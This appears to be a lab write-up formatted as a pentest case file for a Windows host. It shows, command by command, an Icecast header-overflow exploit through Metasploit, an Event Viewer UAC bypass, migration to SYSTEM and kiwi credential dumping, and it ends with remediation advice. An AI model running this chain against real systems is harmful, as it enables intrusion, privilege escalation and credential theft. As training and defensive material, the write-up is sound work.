Icecast header overflow, UAC bypass, and SYSTEM token migration
Foundations Windows engagement: Icecast on 8000 (CVE-2004-1561) yielded Meterpreter as Dark; bypassuac_eventvwr elevated integrity; migration into spoolsv.exe and kiwi recovered SYSTEM and credentials.
- Case files
- Icecast header overflow, UAC bypass, and SYSTEM token migration
Unauthenticated Icecast RCE landed Meterpreter. Local exploit suggester pointed at Event Viewer UAC bypass; migrating to a SYSTEM process completed the engagement.
nmap pinned Icecast on 8000; Metasploit icecast_header opened Meterpreter as Dark.
bypassuac_eventvwr elevated the session; migrate to spoolsv.exe and kiwi dumped credentials.
Engagement summary
Unauthenticated Icecast RCE landed Meterpreter. Local exploit suggester pointed at Event Viewer UAC bypass; migrating to a SYSTEM process completed the engagement.
ICE (10.10.203.69 / DARK-PC) exposed SMB, RDP, and Icecast on 8000. Metasploit exploit/windows/http/icecast_header (CVE-2004-1561) returned a Meterpreter session as Dark. post/multi/recon/local_exploit_suggester recommended exploit/windows/local/bypassuac_eventvwr; after elevation we migrated into spoolsv.exe for NT AUTHORITY\SYSTEM and loaded kiwi to dump Dark:Password01! and local hashes. MS17-010 appeared in vuln scans but was not required for this path.
Business impact
Unpatched media servers on the corporate network are remote code execution. UAC bypasses turn medium-integrity shells into Administrators. Patch or remove Icecast, restrict 8000, and monitor for Event Viewer UAC abuse and unexpected SYSTEM migrations.
Icecast CVE-2004-1561 RCE
nmap pinned Icecast on 8000; Metasploit icecast_header opened Meterpreter as Dark.
OPERATOR · NMAP
savvy@lab:~$ nmap 10.10.203.69 -sV -Pn -A --script=vuln -T4
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
8000/tcp open http Icecast
OPERATOR · MSF ICECAST
savvy@lab:~$ msfconsole -q
msf6 > use exploit/windows/http/icecast_header
msf6 > set RHOSTS 10.10.203.69
msf6 > set LHOST tun0
msf6 > run
Meterpreter session 1 opened
meterpreter > getuid
Server username: DARK-PC\Dark
UAC bypass and SYSTEM migration
bypassuac_eventvwr elevated the session; migrate to spoolsv.exe and kiwi dumped credentials.
OPERATOR · UAC / SYSTEM
meterpreter > run post/multi/recon/local_exploit_suggester
exploit/windows/local/bypassuac_eventvwr
msf6 > use exploit/windows/local/bypassuac_eventvwr
msf6 > set SESSION 1
msf6 > run
meterpreter > migrate -N spoolsv.exe
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
meterpreter > creds_all
Dark : Password01!
Remediation
Upgrade or remove Icecast; block 8000 at the edge. Enable UAC hardening and application control. Rotate credentials after any Meterpreter foothold.